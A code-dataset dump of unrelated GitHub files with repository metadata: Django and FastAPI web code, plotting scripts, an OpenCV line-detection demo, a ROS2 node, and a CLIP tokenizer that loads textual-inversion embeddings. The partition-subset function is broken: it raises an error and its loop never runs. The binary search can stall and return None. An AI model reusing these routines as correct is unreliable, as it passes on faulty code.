ipdb.set_trace()\n pass\n except Exception as ex:\n import ipdb; ipdb.set_trace()\n ex\n pass\n\n for address_part in result['results'][0]['address_components']:\n if \"locality\" in address_part['types']:\n json_neighbourhood = bagno.get(\"neighbourhood\", None)\n if json_neighbourhood and json_neighbourhood != address_part[\"long_name\"]:\n n_name = json_neighbourhood\n else:\n n_name = address_part[\"long_name\"]\n elif \"administrative_area_level_3\" in address_part['types']:\n m_name = address_part[\"long_name\"]\n elif \"administrative_area_level_2\" in address_part['types']:\n d_name = address_part[\"long_name\"]\n if not (n_name and m_name and d_name):\n if not n_name:\n if \"neighbourhood\" in bagno and bagno[\"neighbourhood\"]:\n n_name = bagno['neighbourhood']\n elif bagno['address'] == \"Fontanelle Abissinia\":\n n_name = \"Riccione\"\n else:\n import ipdb; ipdb.set_trace()\n elif n_name == \"Torre Pedrera\":\n m_name = d_name = \"Rimini\"\n else:\n import ipdb; ipdb.set_trace()\n if bagno['address'] == \"Via Spazzoli Tonino, 3\":\n b.address = \"Via Giovanni Spallazzi, 1\"\n b.save()\n if n_name == \"Casalborsetti\":\n n_name = \"Casal Borsetti\"\n cache[h] = (n_name, m_name, d_name)\n with open(\"restore_cities.json\", 'w') as outfile:\n json.dump(cache, outfile)\n d = District.objects.filter(name=d_name)\n if not d:\n logger.info(\"creating district %s\" % d_name)\n d = District(name=d_name)\n d.save()\n else:\n d = d[0]\n m = Municipality.objects.filter(name=m_name)\n if not m:\n logger.info(\"creating municipality %s\" % m_name)\n m = Municipality(name=m_name)\n m.district = d\n m.save()\n else:\n m = m[0]\n\n n = Neighbourhood.objects.filter(name=n_name)\n if not n:\n logger.info(\"creating neighbourhood %s\" % n_name)\n n = Neighbourhood(name=n_name)\n n.municipality = m\n n.save()\n else:\n n = n[0]\n b.neighbourhood = n\n logger.info(\"[%d/%d]assigning neighbourhood %s municipality %s city %s to bagno %s\" % (count, tot, n.name, m.name, d.name, b.name, ) )\n b.save()\n","repo_name":"parruc/bagnialmare","sub_path":"bagni/management/commands/restore_cities.py","file_name":"restore_cities.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28529944907","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport matplotlib\nfrom math import sqrt\n\n\n\n\n\n\nMARKERLIST = ['o','x','d','+','^','*', 's']\nwith open(\"/Users/x/hashtable_benchmark_laptop.json\",\"r\") as file:\n data = json.load(file)\nlabels = []\ncputime = []\nsamplesize = []\nplotData = dict()\nalgs = set()\nsizes = set()\nfor x in data[\"benchmarks\"]:\n if '/' in x[\"name\"]:\n # labels.append(x[\"name\"].split(\"/\")[0])\n # cputime.append(float(x[\"cpu_time\"]))\n # samplesize.append(int(x[\"name\"].split(\"/\")[1]))\n sampleS = int(x[\"name\"].split(\"/\")[1])\n name = x[\"name\"].split(\"/\")[0]\n cpuT = float(x[\"cpu_time\"])\n algs.add(name)\n sizes.add(sampleS)\n if name in plotData:\n plotData[name].append([sampleS,sampleS/cpuT])\n else:\n plotData[name] = []\n plotData[name].append([sampleS,sampleS/cpuT])\nprint(plotData)\nalgoCount = len(algs)\nsizeCount = len(sizes)\n\nwidth = 0.6\nxlist = []\nylist = []\nlabels = []\ncounter = 0\nfor x in plotData:\n xlist.append([])\n ylist.append([])\n labels.append(x)\n for y in plotData[x]:\n xlist[len(xlist)-1].append(\"{:.0e}\".format(y[0]))\n ylist[len(ylist)-1].append(y[1])\n\nfont = {'family' : 'serif',\n 'size' : 10}\n\nmatplotlib.rc('font', **font)\nfor i in range(0,len(xlist)):\n plt.plot(xlist[i],ylist[i],marker=MARKERLIST[i], label=labels[i])\nplt.xlabel('element size')\nplt.ylabel('throughput in elements/ms')\nplt.tight_layout()\nplt.legend()\n\nplt.savefig(\"x.pdf\")\n\nplt.show()\n","repo_name":"MartinFritz/ba_thesis","sub_path":"jsonparser3.py","file_name":"jsonparser3.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20344094724","text":"from django.shortcuts import render, redirect\n# Article.objects를 위해 import 한다.\nfrom .models import Article\n\n# Create your views here.\n\n\ndef index(request):\n # 데이터 베이스에서 모든 값을 뽑아온다.\n articles = Article.objects.all()\n context = {\n 'articles': articles,\n }\n return render(request, 'articles/index.html', context)\n\n\ndef new(request):\n return render(request, 'articles/new.html')\n\n\ndef create(request):\n # 1. new에서 보낸 데이터 받기\n # CSRF 검증에 실패했습니다. 요청을 중단하였습니다.\n # POST의 경우에는 보통 데이터베이스에 조작을 가하기 때문에 최소한의 신원확인이 필수이다.\n title = request.POST.get('title')\n content = request.POST.get('content')\n\n # 2. db에 저장\n # article = Article()\n # article.title = title\n # article.content = content\n # article.save()\n\n article = Article(title=title, content=content)\n # 데이터가 유효한지 검사\n # 데이터를 저장할 타이밍이 나온다.\n article.save()\n article.pk\n # 이건 데이터를 저장할 시간이 안나온다. 그래서 잘 안쓰임\n # Article.objects.create(title=title, content=content)\n\n # return render(request, 'articles/index.html')\n return redirect('articles:detail', article.pk)\n # return redirect('articles:index')\n\n\ndef detail(request, pk):\n # 뒤에있는 값으로 찾는다.\n article = Article.objects.get(pk=pk)\n context = {\n 'article': article,\n }\n\n return render(request, 'articles/detail.html', context)\n\n\ndef delete(request, pk):\n if request.method == 'POST' :\n article = Article.objects.get(pk=pk)\n article.delete()\n return redirect('articles:index')\n else :\n return redirect('articles:detail',pk)\n\n\ndef edit(request, pk) :\n article = Article.objects.get(pk=pk)\n context = {\n 'article' : article,\n }\n return render(request,'articles/edit.html',context)\n\n\ndef update(request, pk) :\n article = Article.objects.get(pk=pk)\n title = request.POST.get('title')\n content = request.POST.get('content')\n\n article.title = title\n article.content = content\n article.save()\n\n return redirect('articles:detail',pk)","repo_name":"Alphanewbie/Django","sub_path":"01_django_orm/crud/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20108999483","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# seabornがあると、グラフがきれいにかける\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfile = 'sample.csv'\nusecols = [1,133]\nskiprows = [0,1,2,3,4,5]\nnames = [\"Time\",\"Between-the-hand\"]\ndf = pd.read_csv(file,usecols=usecols,skiprows=skiprows,names=names,header=None)\n# print(df)\nprint(df[\"Between-the-hand\"])\n# print(df.query(\"Time <= 10\"))\n\n# これより下で3次元プロットを試す。\n# Top.head_Xだけ抽出する\nlimit_time = 20\nX = df.query(\"Time <= %i\"%limit_time)[names[0]]\nY = df.query(\"Time <= %i\"%limit_time)[names[1]]\n# Z = df.query(\"Time <= %i\"%limit_time)[\"Top.head_Z\"]\n# print(len(X))\n# fig = plt.figure()\nplt.figure()\n# ax = Axes3D(fig)\nl=0\nt = len(X)-1\nb=0\na=0\ns=t-b\nwhile(l<=t):\n while(a<=s):\n plt.plot(X[l:t+1],Y[l:t+1],\n c=((a/s)*1.0,0.0,((s-a)/s)*1.0),lw=0.5)\n l=l+1\n a=a+1\nplt.xlabel(names[0])\nplt.ylabel(names[1])\n# ax.set_zlabel(\"Top.head_Z\")\nplt.show()","repo_name":"masaki0114/labo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23172592122","text":"from fastapi import status, HTTPException, Depends, APIRouter\nfrom sqlalchemy.orm import Session\nfrom .. import models, schemas, database, oauth2\n\n\n\n\nrouter = APIRouter(\n prefix='/posts',\n tags= ['Posts'] # group the posts in Posts catagory in 127.0.0.1:8000/docs\n)\n\n\n\n\n# read all post\n@router.get('/', response_model=list[schemas.Post])\ndef get_posts(db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user),\n limit: int = 10):\n posts = db.query(models.Post).limit(limit).all()\n\n # get all posts of a specific user id\n # posts = db.query(models.Post).filter(models.Post.user_id == current_user.id).all()\n\n return posts\n\n\n# read single post\n@router.get('/{id}', response_model=schemas.Post)\ndef get_post_detail(id: int, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n \n post = db.query(models.Post).filter(models.Post.id == id).first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'Post with id: {id} was not found')\n return post\n\n\n# create post\n@router.post('/create', status_code=status.HTTP_201_CREATED, response_model=schemas.Post)\ndef create_post(post: schemas.PostCreate, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n\n # new_post = models.Post(title=post.title, content=post.content, published=post.published)\n new_post = models.Post(user_id = current_user.id, **post.model_dump())\n \n db.add(new_post)\n db.commit()\n db.refresh(new_post)\n\n return new_post\n\n\n# update post \n@router.put('/{id}', response_model=schemas.Post)\ndef create_post(id: int, \n updated_post: schemas.PostUpdate, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n \n post_query = db.query(models.Post).filter(models.Post.id == id)\n post = post_query.first()\n\n if post is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'Post with id: {id} does not exist!')\n \n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail='Not authorized to perform requested action!')\n \n post_query.update(updated_post.model_dump(), synchronize_session=False)\n db.commit()\n\n return post\n\n\n# delete post\n@router.delete('/{id}', status_code=status.HTTP_204_NO_CONTENT)\ndef delete_post(id: int, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n \n post_query = db.query(models.Post).filter(models.Post.id == id)\n post = post_query.first()\n\n if post is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'Post with id: {id} does not exist!')\n \n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail='Not authorized to perform requested action!')\n \n post_query.delete(synchronize_session=False)\n db.commit()\n return {'message': 'post deleted'}\n\n\n\n\n\n\n\n","repo_name":"rhsajib/api-design-for-social-media-app","sub_path":"app/routers/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23046791584","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.express as px\n\ndata = pd.read_csv('./assets/CSV/Students.csv')\ndata.sort_values('FIO', inplace=True)\n\nexternal_stylesheets = [\n {\n 'href': 'https://fonts.googleapis.com/css2?'\n 'family=Lato:wght@400;700&display=swap',\n 'rel': 'stylesheet',\n },\n]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ncolors = {\n 'background': '#2A335E',\n 'text': 'White',\n 'color': '#4878FB',\n 'gridColor': '#3F4670',\n}\n\npie = px.pie(data, labels=[1, 2, 3, 4, 5], values=data['Math'])\n\nline = px.line(data, x=data['FIO'],\n y=data['Math'], hover_name=data['FIO'])\n\nline.update_xaxes(visible=True, fixedrange=True, gridcolor=colors['gridColor'])\nline.update_yaxes(visible=True, fixedrange=True, gridcolor=colors['gridColor'])\n\nline.update_layout(\n title='Оценки по курсу \"Математика\"',\n plot_bgcolor=colors['background'],\n paper_bgcolor=colors['background'],\n font_color=colors['text'],\n font_size=14,\n font_family='Monospace',\n)\n\n\napp.layout = html.Div(\n\n children=[\n html.Nav(\n children=[\n html.Img(src='./assets/icons/user.png', className='Img'),\n html.Img(src='./assets/icons/course.png', className='Img'),\n html.Img(src='./assets/icons/settings.png', className='Img'),\n ],\n id=\"nav\"\n ),\n html.Div(\n children=[\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n ],\n id='graphBlocks'\n )\n ],\n id='main'\n)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Pointer90/Admin_panel","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12672483789","text":"import argparse\nimport re\nimport sys\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Modify Wordpress database dump.')\n parser.add_argument(\n '--old-url',\n type=str,\n help='the old URL e.g. http://www.oldurl.com',\n required=True\n )\n parser.add_argument(\n '--new-url',\n type=str,\n default='http://localhost:8000',\n help='the new URL e.g. http://www.newurl.com',\n )\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n # Find out what the options, postmeta and posts tables are called from the\n # database dump.\n table_names = {}\n table_mappings = {\n 'wp_options' : 'options',\n 'wp_postmeta': 'postmeta',\n 'wp_posts': 'posts'\n }\n for line in sys.stdin:\n if line.startswith('CREATE TABLE'):\n table_name = line.split('`')[1]\n for k, v in table_mappings.iteritems():\n if table_name.endswith(v):\n table_names[k] = table_name\n print(line)\n\n change = (args.old_url, args.new_url)\n\n print(\"-- Added by %s\" % sys.argv[0])\n\n print(\"UPDATE wp_options SET option_value = replace(option_value, '%s', '%s') WHERE option_name = 'home' OR option_name = 'siteurl';\" % change)\n\n print(\"UPDATE wp_posts SET guid = replace(guid, '%s', '%s');\" % change)\n\n print(\"UPDATE wp_posts SET post_content = replace(post_content, '%s', '%s');\" % change)\n\n print(\"UPDATE wp_postmeta SET meta_value = replace(meta_value, '%s', '%s');\" % change)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nlindblad/wordpress-development","sub_path":"utils/modify_database_dump.py","file_name":"modify_database_dump.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28764139105","text":"from google_sheets_reader.src.team_members import TeamMembers\nfrom google_sheets_reader.src.progress_data import ProgressData\nfrom google_sheets_reader.constants import Constants\nfrom google_sheets_reader.src.progress_data import Status\nfrom datetime import datetime\n\n\n# Only add tasks which have been updated today\ndef _check_date(listed_date: str) -> bool:\n today = _get_today()\n if not listed_date.__eq__(today):\n return False\n return True\n\n\ndef _get_today() -> str:\n return datetime.today().strftime(\"%Y/%m/%d\")\n\n# return false if given member is not a team member\ndef _check_member(member: str) -> bool:\n if member.__eq__(TeamMembers.Simon) or member.__eq__(TeamMembers.Andreas) or member.__eq__(TeamMembers.Tom) or member.__eq__(TeamMembers.Jesse):\n return True\n return False\n\n\ndef _check_finished(status: str) -> bool:\n return status.__eq__(Status.Finished)\n\n\ndef _check_not_started(status: str) -> bool:\n return status.__eq__(Status.NotStarted)\n\n\n# Gather progress data for each team member then convert to a message string\nclass DataCollector: \n def __init__(self) -> None:\n self.all_data = {\n TeamMembers.Simon: ProgressData(),\n TeamMembers.Andreas: ProgressData(),\n TeamMembers.Tom: ProgressData(),\n TeamMembers.Jesse: ProgressData()\n }\n\n\n # Add dialog data that is in progress, waiting for PR, or finished that day\n def _add_dialog_data(self, row) -> None:\n team_member_col = 1\n status_col = 2\n date_col = 3\n\n if ((not _check_member(row[team_member_col])) or \n ( _check_finished(row[status_col]) and not _check_date(row[date_col])) or \n (_check_not_started(row[status_col]))):\n return\n\n member_data = self.all_data[row[1]]\n progress_list = member_data.data[row[2]]\n progress_list.append(row[0])\n\n\n # Add server data that is in progress, waiting for PR, or finished that day\n def _add_server_data(self, row) -> None:\n task_name_col = 1\n server_team_member_col = 5\n server_status_col = 6\n server_date_col = 7\n client_team_member_col = 9\n client_status_col = 10\n client_date_col = 11\n\n is_invalid_server = (not _check_member(row[server_team_member_col]) or \n (_check_finished(row[server_status_col]) and not _check_date(row[server_date_col])) or \n (_check_not_started(row[server_status_col])))\n \n is_invalid_client = (not _check_member(row[client_team_member_col]) or\n (_check_finished(row[client_status_col]) and not _check_date(row[client_date_col])) or\n (_check_not_started(row[client_status_col])))\n\n if not is_invalid_server:\n member_data = self.all_data[row[server_team_member_col]]\n progress_list = member_data.data[row[server_status_col]]\n progress_list.append(f\"[サーバー] {row[task_name_col]}\")\n\n if not is_invalid_client:\n member_data = self.all_data[row[client_team_member_col]]\n progress_list = member_data.data[row[client_status_col]]\n progress_list.append(f\"[クライアント] {row[task_name_col]}\")\n\n\n # Add dialog data \n def add_dialog_data(self, data) -> None:\n for d in data:\n self._add_dialog_data(d)\n\n \n # Add server data\n def add_server_data(self, data) -> None:\n for d in data:\n self._add_server_data(d)\n\n\n def to_string(self) -> str:\n res = f\"*{_get_today()} 進捗情報:*\\n\\n\\n\"\n for key, value in self.all_data.items():\n res += f\"{key}\\n\\n\"\n for embedKey, embedValue in value.data.items():\n if len(embedValue) == 0:\n continue\n res += \"```\"\n res += f\"{embedKey}\\n\"\n for task in embedValue:\n res += f\"{Constants.INDENT}{task}\\n\"\n res += \"```\"\n res += \"\\n\"\n res += \"\\n\\n\" \n return res\n ","repo_name":"JesseLeung97/steins-progress-logger","sub_path":"google_sheets_reader/src/assembler.py","file_name":"assembler.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27782240579","text":"#116.\n\ndef partition(nums):\n all_sum = sum(nums)\n\n\n if all_sum %2 != 0:\n return False\n\n half = int(all_sum/2)\n table = [[False] * (half+1)] * len(nums)+1\n\n for i in range(len(nums) -1, -1): # iterates decreaseing\n for s in range(half+1): #iterate increasing\n # sum is 0\n #first column\n if s == 0:\n table[i][0] = True\n continue\n\n #bottom row (i is length of nums)\n if i == len(nums):\n table[i][s] = False\n continue\n\n #current sum is > num at i\n if s >= nums[i]:\n table[i][s] = table[i+1][s-nums[i]]\n\n #exclude/include\n table[i][s] = table[i][s] or table[i+1][s]\n\n return table[0][half]\n","repo_name":"n-gibs/dsa","sub_path":"dp/class/partition_equal_subset.py","file_name":"partition_equal_subset.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8940950648","text":"def linear_search(arr, target):\n for it in arr:\n if it == target:\n return arr.index(it)\n return -1 # not found\n\n\ndef binary_search(arr, target):\n if len(arr) == 0:\n return -1 # array empty\n low = 0\n high = len(arr) - 1\n max_loops = len(arr) + 1\n num_of_loops = 1\n while num_of_loops < max_loops:\n midpoint = (low + high) // 2\n if arr[midpoint] == target:\n return midpoint\n elif arr[midpoint] < target:\n low = midpoint\n else:\n high = midpoint\n num_of_loops += 1\n\n\ndef binary_search_recursive(arr, target, low, high):\n middle = (low + high) // 2\n if len(arr) == 0:\n return -1 # array empty\n elif arr[middle] == target:\n return middle\n elif arr[middle] < target:\n return binary_search_recursive(arr, target, middle, high)\n else:\n return binary_search_recursive(arr, target, low, middle)\n","repo_name":"heiligbasil/Sorting","sub_path":"src/searching/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74630556327","text":"#!/usr/bin/python\n#coding=utf8\n#filename=toolbar.py\n\n'''\nCreated on 2010/07/29\n\n@author: hooxin\n'''\nimport sys\nfrom PyQt4 import QtGui,QtCore\n\nclass MainWindow(QtGui.QMainWindow):\n\tdef __init__(self):\n\t\tQtGui.QMainWindow.__init__(self)\n\t\t\n\t\tself.resize(250,150)\n\t\tself.setWindowTitle('toolbar')\n\t\tself.exit = QtGui.QAction(QtGui.QIcon(u'/home/hooxin/Pic/术士.jpg'),'exit',self)\n\t\tself.exit.setShortcut('Ctrl+Q')\n\t\tself.connect(self.exit, QtCore.SIGNAL('triggered()'),QtCore.SLOT('close()'))\n\t\t\n\t\tself.toolbar = self.addToolBar('exit')\n\t\tself.toolbar.addAction(self.exit)\n\t\t\n\napp=QtGui.QApplication(sys.argv)\nmain=MainWindow()\nmain.show()\nsys.exit(app.exec_())","repo_name":"firefoxmmx2/pythontest","sub_path":"src/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5491119904","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 16 18:03:41 2021\n\n@author: fabian\n\"\"\"\n\nimport rclpy\nfrom rclpy.node import Node\nfrom geometry_msgs.msg import Point \nfrom cv_bridge import CvBridge\nimport cv2\nimport numpy as np\n\nclass MinimalSubscriber(Node):\n\n def __init__(self):\n super().__init__('minimal_subscriber')\n self.subscription = self.create_subscription(Point, 'XY', self.listener_callback, 10) ###### here\n self.subscription\n self.i = 0\n \n def listener_callback(self,msg):\n self.i += 1\n print(\"listener iteration: \", self.i)\n self.get_logger().info('sub done. interation: ')\n print(\"x: {} \\ny: {}\".format(msg.x,msg.y))\n self.get_logger().info(str(msg.x))\n self.get_logger().info(str(msg.y))\n \ndef main(args=None):\n\n rclpy.init(args=args)\n minimal_subscriber = MinimalSubscriber()\n rclpy.spin(minimal_subscriber)\n minimal_subscriber.destroy_node()\n rclpy.shutdown()\n\n#def main(args=None):\n# pic1 = (return_array(subfolder, \"c1.png\"))\n# pic2 = (return_array(subfolder, \"c1.png\"))\n# msg = BatchPic()\n# create_batch(msg,pic1,pic2,1)\n## msg.pic1 = pic1\n## msg.pic2 = pic2\n## msg.robotid = 1\n# print(msg)\nif __name__ == '__main__':\n main()\n","repo_name":"fabianraus83/human_following","sub_path":"human_following/XYCoordinateWithUSBCamera_Sub.py","file_name":"XYCoordinateWithUSBCamera_Sub.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38125511262","text":"import cv2 as cv\r\nimport numpy as np\r\n# 21.霍夫直線變換介紹 Hough Line Transform\r\n\r\n\r\ndef line_detection(image):\r\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n # 先求得到Canny邊緣\r\n edges = cv.Canny(gray, 50, 150, apertureSize=3)\r\n cv.imshow(\"edges_image\", edges)\r\n lines = cv.HoughLines(edges, 1, np.pi/180, 250)\r\n for line in lines:\r\n print(type(lines))\r\n rho, theta = line[0]\r\n # 極座標的套用\r\n a = np.cos(theta)\r\n b = np.sin(theta)\r\n x0 = a * rho\r\n y0 = b * rho\r\n x1 = int(x0 + 1000 * (-b))\r\n y1 = int(y0 + 1000 * (a))\r\n x2 = int(x0 - 1000 * (-b))\r\n y2 = int(y0 - 1000 * (a)) \r\n cv.line(image, (x1, y1), (x2, y2),(0, 0, 255), 2)\r\n cv.imshow(\"image-lines\", image)\r\n\r\n# possible表將有可能是直線的部分抓取\r\ndef line_detect_possible_demo(image):\r\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n edges = cv.Canny(gray, 50, 150, apertureSize=3)\r\n lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=50, maxLineGap=10)\r\n for line in lines:\r\n print(type(lines))\r\n x1, y1, x2, y2 = line[0]\r\n cv.line(image, (x1, y1), (x2, y2),(0, 0, 255), 2)\r\n cv.imshow(\"line_detect_possible_demo\", image)\r\n\r\nprint(\"-------hello python--------\")\r\nsrc = cv.imread(\"F:/021.jpg\") \r\ncv.namedWindow(\"input image\", cv.WINDOW_AUTOSIZE)\r\ncv.imshow(\"image\", src)\r\n \r\n# line_detection(src)\r\nline_detect_possible_demo(src)\r\n\r\ncv.waitKey(0)\r\n\r\ncv.destoryAllWindows()","repo_name":"HJHJKOKO/learning_to_OpenCV","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23280767719","text":"\n\n\nimport random\nimport torch\nfrom transformers import CLIPTokenizer\n\n\n\n\n\nclass CLIPTokenizerWithEmbeddings(CLIPTokenizer):\n '''can read embeddings in automatic1111 format or from torch.save({placeholder_toke : embedding})'''\n \n def replace_placeholder_tokens_in_text(self, text, vector_shuffle=False):\n if hasattr(self, 'token2all_tokens'):\n for token, all_tokens in self.token2all_tokens.items():\n if vector_shuffle:\n all_tokens = all_tokens[:]\n random.shuffle(all_tokens)\n\n if isinstance(text, list):\n text = [t.replace(token, \" \".join(all_tokens)) for t in text]\n else:\n text = text.replace(token, \" \".join(all_tokens))\n \n return text\n \n\n def __call__(self, text, *args, vector_shuffle=False, **kwargs):\n return super().__call__(self.replace_placeholder_tokens_in_text(text, vector_shuffle=vector_shuffle), *args, **kwargs)\n\n\n def encode(self, text, *args, vector_shuffle=False, **kwargs):\n return super().encode(self.replace_placeholder_tokens_in_text(text, vector_shuffle=vector_shuffle), *args, **kwargs)\n\n\n\n def init_attributes(self):\n if not hasattr(self, 'token2id'):\n self.__setattr__('token2id', {})\n \n if not hasattr(self, 'token_id2all_token_ids'):\n self.__setattr__('token_id2all_token_ids', {})\n\n if not hasattr(self, 'token2all_tokens'):\n self.__setattr__('token2all_tokens', {})\n\n def load_embedding(self, token, path, text_encoder, use_orig_token=False):\n with torch.no_grad():\n\n self.init_attributes() \n \n x = torch.load(path)\n \n is_automatic1111_embedding = False\n \n if 'string_to_param' in x:\n is_automatic1111_embedding = True\n \n \n if is_automatic1111_embedding:\n # {\n # 'string_to_token' : {'*': 265},\n # 'string_to_param':tensor\n # ...\n # }\n \n # place_holder token will not be used in the embedding but will be replaced with the token argument\n placeholder_token = list(x['string_to_token'].keys())[0]\n embedding_matrix = x['string_to_param'][placeholder_token]\n \n else:\n placeholder_token = list(x.keys())[0]\n embedding_matrix = x[placeholder_token]\n \n if use_orig_token:\n token = placeholder_token\n\n print(text_encoder.get_input_embeddings().weight.data.dtype)\n \n n_vectors = embedding_matrix.shape[0]\n embedding_size = embedding_matrix.shape[1]\n \n tokens_to_add = [token] + [token+str(i) for i in range(n_vectors-1)]\n num_added_toks = self.add_tokens(tokens_to_add)\n \n text_encoder.resize_token_embeddings(self.__len__())\n \n token_id = self.convert_tokens_to_ids(token)\n token_ids = self.convert_tokens_to_ids(tokens_to_add)\n \n self.token2id[token] = token_id\n self.token_id2all_token_ids[token_id] = token_ids\n self.token2all_tokens[token] = tokens_to_add\n \n \n token_embeds = text_encoder.get_input_embeddings().weight.data\n \n token_embeds[token_id:token_id+n_vectors] = embedding_matrix\n \n\n\n def add_embedding(self, token, text_encoder, initializer_token=None, n_vectors=4, if_exists='error'):\n ''' \n adds new token to tokenizer with multiple embeddings \n @initializer_token: string, eg 'cat'\n @if_exists: one of ['error', 'append']\n '''\n\n self.init_attributes()\n\n\n with torch.no_grad():\n if token in self.token2all_tokens: # token already exists\n if if_exists=='error':\n raise ValueError(\n f\"The tokenizer already contains the token {token}. Please pass a different\"\n \" `placeholder_token` that is not already in the tokenizer.\"\n )\n \n existing_tokens = self.token2all_tokens[token] # eg ['', '0', '1', '2']\n tokens_to_add = [token+str(i+len(existing_tokens)-1) for i in range(n_vectors)]\n num_added_toks = self.add_tokens(tokens_to_add)\n\n self.token2all_tokens[token] += tokens_to_add\n\n\n else:\n\n tokens_to_add = [token] + [token+str(i) for i in range(n_vectors-1)]\n num_added_toks = self.add_tokens(tokens_to_add)\n\n self.token2all_tokens[token] = tokens_to_add\n\n\n text_encoder.resize_token_embeddings(self.__len__())\n\n token_ids = self.convert_tokens_to_ids(tokens_to_add)\n\n token_embeds = text_encoder.get_input_embeddings().weight.data\n\n if initializer_token:\n\n init_token_ids = self.encode(initializer_token, add_special_tokens=False)\n for i, id in enumerate(token_ids):\n token_embeds[id] = token_embeds[init_token_ids[i * len(init_token_ids)//n_vectors]]\n\n else:\n for id in token_ids:\n token_embeds[id] = torch.randn_like(token_embeds[id])\n\n\n\n def get_mask(self, accelerator):\n # Get the mask of the weights that won't change\n mask = torch.ones(self.__len__()).to(accelerator.device, dtype=torch.bool)\n\n for token in self.token2all_tokens.keys():\n token_ids = self.encode(token, add_special_tokens=False)\n for i in range(len(token_ids)):\n mask = mask & (torch.arange(self.__len__()) != token_ids[i]).to(accelerator.device)\n return mask\n\n\n\n\n\ndef save_progress(tokenizer, text_encoder, accelerator, save_path):\n if not hasattr(tokenizer, 'token2all_tokens'):\n print('no added tokens, no embeddings to save')\n return\n print('save added tokens: ', tokenizer.token2all_tokens.keys())\n learned_embeds_dict = {}\n for placeholder_token in tokenizer.token2all_tokens.keys():\n placeholder_token_ids = tokenizer.encode(placeholder_token, add_special_tokens=False)\n\n learned_embeds = accelerator.unwrap_model(text_encoder).get_input_embeddings().weight[placeholder_token_ids]\n print(f'embedding.shape of {placeholder_token}: ', learned_embeds.shape)\n\n if len(placeholder_token_ids) == 1:\n # add extra dimension\n learned_embeds = learned_embeds[None]\n learned_embeds_dict[placeholder_token] = learned_embeds.detach().cpu()\n torch.save(learned_embeds_dict, save_path)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\n from diffusers import StableDiffusionPipeline, DDIMScheduler, DPMSolverMultistepScheduler, LMSDiscreteScheduler, EulerDiscreteScheduler, DDPMScheduler, UNet2DConditionModel, AutoencoderKL\n from transformers import CLIPTextModel, CLIPTokenizer\n import urllib.request \n urllib.request.urlretrieve('https://huggingface.co/spaablauw/FloralMarble/resolve/main/FloralMarble-400.pt', './data/FloralMarble-400.pt')\n\n\n model_path = 